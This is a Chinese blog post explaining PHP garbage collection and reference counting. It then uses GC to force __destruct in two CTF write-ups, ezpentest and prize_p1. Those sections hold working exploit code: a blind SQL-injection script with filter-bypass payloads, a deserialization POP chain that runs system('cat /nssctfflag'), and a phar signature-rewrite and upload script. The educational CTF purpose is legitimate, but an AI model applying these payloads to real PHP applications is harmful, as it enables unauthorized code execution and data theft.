PHP 垃圾回收机制(GC)

已于 2022-11-16 11:16:23 修改
阅读量3.3k 收藏 14
点赞数 3
文章标签: python php
于 2022-10-30 16:14:46 首次发布
Aiwin
本文链接:https://blog.csdn.net/weixin_53090346/article/details/127598455
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

目录

前言

一、GC回收机制是什么?

 二、引用技术的知识

三、GC垃圾回收机制的使用

四、[CISCN 2022 初赛]ezpentest

五、NSSCTF prize_p1

前言

提示:这里可以添加本文要记录的大概内容:

以前刷题的时候也遇到过PHP的GC回收机制,觉得挺烦的,一直没有去尝试,今天做题的时候在[CISCN 2022 初赛]ezpentest又遇到了,对GC回收机制有所了解,做下记录,下文介绍皆针对PHP7以上。

提示:以下是本篇文章正文内容,下面案例可供参考

一、GC回收机制是什么?

PHP与其它语言一样,会有垃圾回收机制,就是我们所说的GC机制,能够销毁内存空间,防止内存溢出,PHP的垃圾回收机制利用引用计数的机制来确定是否需要回收,简单来说,就是引用计数为0的变量可以进行回收,而这些变量存在于一个"zval"的变量容器中,容器中包含了变量的类型和值,以及两个字节的信息,一个是标识变量是否是引用集合,用于分开普通变量和引用变量,另一个是"refcount",用于确定指向此变量的个数,即引用的个数。GC回收机制可以通过修改PHP配置开实现开启和关闭。

 二、引用技术的知识

1、普通类型的引用计数

在PHP5中,当一个变量=赋值给另一个变量,不会立即为新变量分配内存空间,而是在原变量的zval中给refcount中加1,当原变量发生改变,才会分配内存空间,而PHP7不一样,PHP7不会再给变量如整型,字符串等进行计数,如果给一个变量&赋值,之前 = 赋值的变量会分配空间。

<?php

$a = 1;
xdebug_debug_zval('a');


$b = $a;
xdebug_debug_zval('a');

$c = &$a;
xdebug_debug_zval('a');

 refcount不对数字,字符串,浮点数等标量进行refcount进行计数,当使用&引用后,is_ref区分引用变量,refcount变为了2。

2、复合类型的计数知识

和标量不一样,考虑复合类型如array,object时,会生成多个eval变量容器。

<?php

$a = array( 'name' => 'aiwin', 'number' => 42 );
xdebug_debug_zval( 'a' );

class Test{
    public $a = 1;
    public $b = 2;

    function handle(){
        echo 'hehe';
    }
}

$test = new Test();
xdebug_debug_zval('test');

可以看到, 分配了多个zval容器,其中数组a和类Test中的变量指向数字标量依旧不进行refcount的计数。

<?php

$a = array('name'=>"aiwin","float"=>4.25);
xdebug_debug_zval( 'a' );

$a[] = &$a;
xdebug_debug_zval('a');

第二个is_ref=1,用于区别引用变量和普通变量,由于数组a被&引用了1次,因此refcount为2,浮点型refcount依旧不计数,数组中的name第一次先计数为1,再被引用了后,计数升为2,最后的&array表示递归循环引用。

三、GC垃圾回收机制的使用

那么,说到底GC回收机制有什么能利用的点呢,这就需要联系起PHP的魔术方法__destrcut函数,在程序结束后php会自动调用__destruct进行自动销毁,如果程序报错或者抛出异常则不会触发__destruct。先来简单看看实际情况下GC回收机制的工作。

<?php
class aiwin{
    public $test;
    public function __construct($test)
    {
        $this->test = $test;
        echo $this->test."构造函数执行"."</br>";
    }
    public function __destruct(){
        echo $this->test."销毁函数执行"."</br>";
    }
}

new aiwin(1);
$a = new aiwin(2);
$b = new aiwin(3);

 

可以看到直接使用new创建类的时,没有进行指向,直接就触发了__destrcut函数当作垃圾回收了。 

那假如使用数组的形式来存储类的创建呢

<?php
class aiwin{
    public $test;
    public function __construct($test)
    {
        $this->test = $test;
        echo $this->test."构造函数执行"."</br>";
    }
    public function __destruct(){
        echo $this->test."销毁函数执行"."</br>";
    }
}

$a=array(new aiwin(1),0);
$a[0]=$a[1];
$b=new aiwin(2);
$c=new aiwin(3);

new出来的类a依旧被立即销毁,因为最后把数组的第二项即0赋值给了数组的第一项,也就相等于new aiwin(1)执行是NULL,也会触发__destruct被当成垃圾回收,这就出现了可利用的点。

四、[CISCN 2022 初赛]ezpentest

 题目给出了过滤的东西

<?php
function safe($a) {
    $r = preg_replace('/[\s,()#;*~\-]/','',$a);
    $r = preg_replace('/^.*(?=union|binary|regexp|rlike).*$/i','',$r);
    return (string)$r;
  }

?>

题目过滤了空格和其它空白字符以及rlike,regexp等字符,这里需要进行sql注入,这里跟GC无关,直接贴出别人的脚本。

import string

import requests

str = string.ascii_letters + string.digits + "$@!^&}{_%"
# 匹配到括号的内容则会溢出,导致500错误
payload = "0'||case'1'when`username`collate'utf8mb4_bin'like'{}%'then+9223372036854775807+1+''else'0'end||'"
payload1 = "0'||case'1'when`password`collate'utf8mb4_bin'like'{}%'then+9223372036854775807+1+''else'0'end||'"
url = 'http://1.14.71.254:28993/login.php'
f = ""
while 1:
    for i in str:
        if i in '%_':
            i = "\\" + i

        resp = requests.post(url=url, data={"username": payload.format(f + i),
                                            "password": "0"})
        # resp=requests.post(url=url,data={"username":"0",
        # "password":payload1.format(f+i)})
        if resp.status_code == 500:
            f += i
            print(f)
            break

使用了case when,使用utf8mb4_bin字符集,这样是为了区别大小写,一旦like匹配正确则会9223372036854775807+1导致溢出,使服务器报500错误,注意当有%_时,要加\进行区分,爆出了用户名和密码登录后是一段PHP的混淆代码,利用工具进行解码后得到两个PHP文件。

1Nd3x_Y0u_N3v3R_Kn0W.php

<?php
session_start();
if(!isset($_SESSION['login'])){
    die();
}
function Al($classname){
    include $classname.".php";
}

if(isset($_REQUEST['a'])){
    $c = $_REQUEST['a'];
    $o = unserialize($c);
    if($o === false) {
        die("Error Format");
    }else{
        spl_autoload_register('Al');
        $o = unserialize($c);
        $raw = serialize($o);
        if(preg_match("/Some/i",$raw)){
            throw new Error("Error");
        }
        $o = unserialize($raw);
        var_dump($o);
    }
}else {
    echo file_get_contents("SomeClass.php");
}

 SomeClass.php文件:

<?php
class A
{
    public $a;
    public $b;
    public function see()
    {
        $b = $this->b;
        $checker = new ReflectionClass(get_class($b));
        if(basename($checker->getFileName()) != 'SomeClass.php'){
            if(isset($b->a)&&isset($b->b)){
                ($b->a)($b->b."");
            }
        }
    }
}
class B
{
    public $a;
    public $b;
    public function __toString()
    {
        $this->a->see();
        return "1";
    }
}
class C
{
    public $a;
    public $b;
    public function __toString()
    {
        $this->a->read();
        return "lock lock read!";
    }
}
class D
{
    public $a;
    public $b;
    public function read()
    {
        $this->b->learn();
    }
}
class E
{
    public $a;
    public $b;
    public function __invoke()
    {
        $this->a = $this->b." Powered by PHP";
    }
    public function __destruct(){
        //eval($this->a); ??? 吓得我赶紧把后门注释了
        //echo "???";
        die($this->a);  //die方法字符串处理
    }
}
class F
{
    public $a;
    public $b;
    public function __call($t1,$t2)
    {
        $s1 = $this->b;
        $s1();
    }
}

?>

这里是一个反序列化的Pop链构造,然后进而达到RCE的效果。

 

通过类E的die方法将类当作字符串调用,进而触发类B的toString方法,让触发类A中的see方法,通过see方法中的($b->a)($b->b)进行RCE。完整的Pop链E::__die()->B::__toString()->A:see()。 see()方法中A->b赋值要不是SomeClass达到原生类如ArrayObject,Error等等。

1Nd3x_Y0u_N3v3R_Kn0W.php文件中的spl_autoload_register是自动加载类的,简单来说就是通过这个方法调用function Al()进而包含SomeClass.php文件。但是关键在于Some被过滤了,进而会抛出错误,导致__destruct方法无法触发。因此要考虑一种方法,能够包含SomeClass类的同时进而也能触发__destruct函数的方法,那么就要利用到上文所说的GC回收机制,WP如下。

<?php
class A
{
    public $a;
    public $b;
    public function see()
    {
        $b = $this->b;
        $checker = new ReflectionClass(get_class($b));
        if(basename($checker->getFileName()) != 'SomeClass.php'){
            if(isset($b->a)&&isset($b->b)){
                ($b->a)($b->b."");
            }
        }
    }
}
class B
{
    public $a;
    public $b;
    public function __toString()
    {
        $this->a->see();
        return "1";
    }
}

class E
{
    public $a;
    public $b;
    public function __invoke()
    {
        $this->a = $this->b." Powered by PHP";
    }
    public function __destruct(){
        //eval($this->a); ??? 吓得我赶紧把后门注释了
        //echo "???";
        die($this->a);
    }
}
class SomeClass{
    public $a;
}
$e=new E();
$b=new B();
$a=new A();
$e->a=$b;
$b->a=$a;
$x=new Error();
$x->a="system";
$x->b="cat /nssctfflag";
$a->b=$x;
$result=new SomeClass();
$result->a=$e;
$result = serialize(array($result,0));
$result = str_replace("i:1","i:0",$result);
$result = urlencode($result);
echo $result;

在构造好反序列赋值给结果$result后,通过数组的形式,键值0是$result,键值1是0,然后通过replace的方法将i本应该等于1的修改成了i=0,从而把i=0指向了NULL,进而造成了GC的垃圾回收机制,触发了__destruct函数。

$result->a=$e;
$result = serialize(array($result,0));
$result = str_replace("i:1","i:0",$result);
$result = urlencode($result);

 

五、NSSCTF prize_p1

进入题目:

<META http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
highlight_file(__FILE__);
class getflag {
    function __destruct() {
        echo getenv("FLAG");
    }
}

class A {
    public $config;
    function __destruct() {
        if ($this->config == 'w') {
            $data = $_POST[0];
            if (preg_match('/get|flag|post|php|filter|base64|rot13|read|data/i', $data)) {
                die("我知道你想干吗,我的建议是不要那样做。");
            }
            file_put_contents("./tmp/a.txt", $data);
        } else if ($this->config == 'r') {
            $data = $_POST[0];
            if (preg_match('/get|flag|post|php|filter|base64|rot13|read|data/i', $data)) {
                die("我知道你想干吗,我的建议是不要那样做。");
            }
            echo file_get_contents($data);
        }
    }
}
if (preg_match('/get|flag|post|php|filter|base64|rot13|read|data/i', $_GET[0])) {
    die("我知道你想干吗,我的建议是不要那样做。");
}
unserialize($_GET[0]);
throw new Error("那么就从这里开始起航吧");

是一道反序列化的题目,跟以往反序列化题目不同的是最后面多了一个throw new Error(),同时对传入的内容做了过滤,禁止了flag、php、base64、read等等,但是没有禁止phar,因此可以考虑使用phar协议。思路大概就是通过config为w,写入phar文件到/tmp/a.txt中,然后再让config为r并且利用phar协议解析/tmp/a.txt文件,从而触发掉_destruct获取到flag,但是throw new Error()会抛出异常,提前阻止进入__destruct函数,从而无法获取到flag,因此要自己触发回收机制,这里就跟上面一样,都是利用GC,使计数指向空,从而回收。

解题如下:0

<?php
class getflag {
}

$c=new getflag();
$phar = new Phar("ph1.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata([0=>$c,1=>NULL]); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

生成phar文件后,修改指向,让数组中原本为1的改成0,从而使得Array[0]指向NULL,触发GC回收机制。但是这里还能显示getflag,因此需要进行zip压缩绕过flag,鉴于以前的经验,在我的电脑上,使用gzip压缩,并且使用sha256修改签名是可以的,直接SHA-1修改签名并且压缩为zip不行。

from hashlib import sha256

file = open('ph1.phar', 'rb').read()

data = file[:-28]

final = file[-8:]

newfile = data+sha256(data).digest()+final

open('poc.phar', 'wb').write(newfile)


import requests


url = 'http://1.14.71.254:28970/'
requests.post(
    url,
    params={
        0: 'O:1:"A":1:{s:6:"config";s:1:"w";}'

    },
    data={
        0: open('poc.phar.gz', 'rb').read()
    }
)

res = requests.post(
    url,
    params={
        0: 'O:1:"A":1:{s:6:"config";s:1:"r";}'
    },
    data={
        0: 'phar://tmp/a.txt'
    }
)
res.encoding='utf-8'
print(res.text)

参考链接:(2条消息) [CISCN 2022 初赛]ezpentest_v2ish1yan的博客-CSDN博客

 总结

GC回收机制还能应用在phar的序列化中,进行签名的修改达到效果,还是要多学习。

M03-Aiwin
关注
  • 3
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
一看就懂系列之 由浅入深聊一聊php垃圾回收机制
咖啡色的羊驼
08-08 1万+
转载请附上本文地址:前言是的,平时经常听到大牛说到的gc,就是垃圾回收器,全称Garbage Collection。早期版本,准确地说是5.3之前(不包括5.3)的垃圾回收机制,是没有专门的垃圾回收器的。只是简单的判断了一下变量的zval的refcount是否为0,是的话就释放否则不释放直至进程结束。乍一看确实没毛病啊,然而其中隐藏着变量内存溢出的风险:http://bugs.php.net/bug
c#如何用好垃圾回收机制GC
01-19
一、为什么需要GC 应用程序对资源操作,通常简单分为以下几个步骤: 1、为对应的资源分配内存 2、初始化内存 3、使用资源 4、清理资源 5、释放内存 应用程序对资源(内存使用)管理的方式,常见的一般有如下几种: 1...
php垃圾回收机制
nailwl
04-19 571
每一种语言都有自己的自动垃圾回收机制,让程序员不必过分关心程序内存分配,但是在OOP中,有些对象需要显式的销毁;防止程序执行内存溢出。一、PHP 垃圾回收机制(Garbage Collector 简称GC)在PHP中,没有任何变量指向这个对象时,这个对象就成为垃圾PHP会将其在内存中销毁;这是PHPGC垃圾处理机制,防止内存溢出。当一个 PHP线程结束时,当前占用的所有内存空间都
php垃圾收集机制原理,PHP 垃圾回收机制详解
weixin_39615741的博客
03-10 276
原标题:PHP 垃圾回收机制详解PHP的基本GC概念PHP语言同其他语言一样,具有垃圾回收机制。那么今天我们要为大家讲解的内容就是关于PHP垃圾回收机制的相关问题。希望对大家有所帮助。PHP strtotime应用经验之谈PHP memory_get_usage管理内存PHP unset全局变量运用问题详解PHP unset函数销毁变量教你快速实现PHP全站权限验证一、PHP 垃圾回收机制(Gar...
[NSSCTF]prize_p1
最新发布
m0_73756016的博客
05-02 1249
之前做了p5 才知道还有p1到p4遂来做一下顺便复习一下反序列化对象的析构函数在对象被销毁时触发,对象被销毁的情况。
php垃圾回收机制
国内某知名游戏公司小菜鸡工程师
06-16 1880
学好垃圾回收机制,防止内存泄漏
浅析PHP7 的垃圾回收机制
01-20
垃圾回收机制 垃圾回收机制是一种动态存储分配方案。它会自动释放程序不再需要的已分配的内存块。 自动回收内存的过程叫垃圾收集。垃圾回收机制可以让程序员不必过分关心程序内存分配,从而将更多的精力投入到业务逻辑。 在现在的流行各种语言当中,垃圾回收机制是新一代语言所共有的特征。 垃圾的产生 PHP7 中复杂类型,像字符串、数组、对象等的数据结构中,头部都有一个 gc, 这个 gc 的作用就是用来对垃圾回收的支持。当变量赋值、传递时,会增加 value 的引用数, unset、return 等释放变量时再减掉引用数,减掉后如果发现 refcount 变为 0 则直接释放 value,这是变量的基本
PHP session垃圾回收机制实例分析
01-02
本文实例讲述了PHP session垃圾回收机制。分享给大家供大家参考,具体如下: session过期时间 在php.ini文件中有这样一个配置,这个配置表示session文件过期时间,默认的话是1440秒,也就是24分钟,这个24分钟是...
解读PHP中的垃圾回收机制
12-18
那么今天我们要为大家讲解的内容就是关于PHP垃圾回收机制的相关问题。希望对大家有所帮助。PHP strtotime应用经验之谈PHP memory_get_usage()管理内存PHP unset全局变量运用问题详解PHP unset()函数销毁变量教你快速...
php垃圾收集机制原理,掌握PHP垃圾回收机制详解
weixin_42532473的博客
03-10 387
php垃圾回收机制可以简单总结为 引用计数 写时复制 COW机制,本文主要和大家分享掌握php垃圾回收机制的知识,希望能帮助到大家。引用计数基本知识官网的解答如下 每个php变量存在一个叫”zval”的变量容器中一个zval变量容器,除了包含变量的类型和值 ,还包括两个字节的额外信息 is_ref 和 refcount is_ref 是个bool值,用来标识这个变量是否是属于引用集合(refer...
PHPGC机制
biliehou5389的博客
08-30 320
就是垃圾回收器,全称Garbage Collection。 php垃圾是如何定义的?准确地说,判断是否为垃圾,主要看有没有变量名指向变量容器zval,如果没有则认为是垃圾,需要释放。 5.3版本以后php是如何处理垃圾内存的?判断处理过程.如果一个zval的refcount增加,那么此zval还在使用,不属于垃圾.如果一个zval的refcount减少到0, 那么zval可以被释放掉,不...
phpgc回收机制,php垃圾回收机制相关(GC
weixin_35337252的博客
03-18 82
一直对php垃圾回收机制不明不白,看一次记录下。首先,说到垃圾回收,得先知道什么情况下才能产生垃圾。正常标量类型的变量,建立出来后产生的变量容器是放到一个统一的大环境下的,但是array和object这种,比如数组的$a[1] = &$a,这种,他们的子类产生的变量容器是存放在这个数组$a自己维护的一个环境 下 的,这个时候如果unset($a)之后, 这个is_ref字段还会是...
PHP垃圾回收机制是怎样的(腾讯)
www.phptuku.com——PHP全栈工程师的摇篮!
05-27 4700
PHP可以自动进行内存管理,清楚不再需要的对象。PHP使用了引用计数这种单纯的垃圾回收机制。每个对象都内含一个引用计数器,每个reference链接到对象,计数器加1,当reference离开生存空间或者被设为null,计数器减1,当某个引用计数器的对象为0时,PHP知道你将不再需要使用这个对象,释放其所占有的内存空间。
php内存管理机制,php垃圾回收和内存管理机制
weixin_31688167的博客
03-11 272
一、PHP 垃圾回收机制(Garbage Collector 简称GC)在PHP中,没有任何变量指向这个对象时,这个对象就成为垃圾PHP会将其在内存中销毁;这是PHPGC垃圾处理机制,防止内存溢出。当一个PHP线程结束时,当前占用的所有内存空间都会被销毁,当前程序中所有对象同时被销毁。GC进程一般都跟着每起一个SESSION而开始运行的.gc目的是为了在session文件过期以后自动销毁删除这...
string会被回收吗_PHP7垃圾回收机制详解(附GC处理完整流程图)
weixin_39930557的博客
12-06 429
php中文网最新课程每日17点准时技术干货分享垃圾回收:简称GC。顾名思义,就是废物重利用的意思。说垃圾回收机制之前,先接触一下内存泄漏。内存泄漏:某大神重口味充满画面感的形象解释:大概意思就是申请了一块地儿拉了会儿屎,拉完后不收拾,那么那块儿地就算是糟蹋了,地越用越少,最后一地全是屎。说到底一句,用了记得还。一定程度上说,垃圾回收机制就是用来擦屁股的。c语言垃圾回收机制:如果用过C语言...
php垃圾清理机制,PHPGC垃圾收集机制
weixin_29046611的博客
03-09 221
每一种语言都有自己的自动垃圾回收机制,让程序员不必过分关心程序内存分配,但是在OOP中,有些对象需要显式的销毁;防止程序执行内存溢出。PHP 垃圾回收机制(Garbage Collector 简称GC)在PHP中,没有任何变量指向这个对象时,这个对象就成为垃圾PHP会将其在内存中销毁;这是PHPGC垃圾处理机制,防止内存溢出。当一个 PHP线程结束时,当前占用的所有内存空间都会被销毁,当前程...
简述 php 中的垃圾回收机制
潘广宇的博客
02-18 2180
php中的变量存储在变量容器zval中,zval中除了存储变量类型和值外,还有is_ref和refcount字段。refcount表示指向变量的元素个数,is_ref表示变量是否有别名。如果refcount为0时,就回收该变量容器。如果一个zval的refcount大于1,它就会进入垃圾缓冲区。当缓冲区达到最大值后,回收算法会循环遍历zval,判断其是否为垃圾,并进行释放处理。...
PHP内存管理 垃圾回收
gb4215287的博客
12-13 379
来源:http://www.jianshu.com/p/63a381a7f70c 概述 1) 操作系统直接管理着内存,所以操作系统也需要进行内存管理,计算机中通常都有内存管理单元(MMU) 用于处理CPU对内存的访问。 2) 应用程序无法直接调用物理内存, 只能向系统申请内存。 向操作系统申请内存空间会引发系统调用。 系统调用会将CPU从用户态切换到内核。 为了减少系统调用开销。通
gc垃圾回收机制的原理
07-28
GC垃圾回收)是一种自动内存管理机制,用于在程序运行时自动回收不再使用的内存空间,以避免内存泄漏和内存溢出等问题。GC 的原理可以简单概括为以下几个步骤: 1. 标记:GC 从根对象开始,通过一系列可达性分析...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M03-Aiwin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值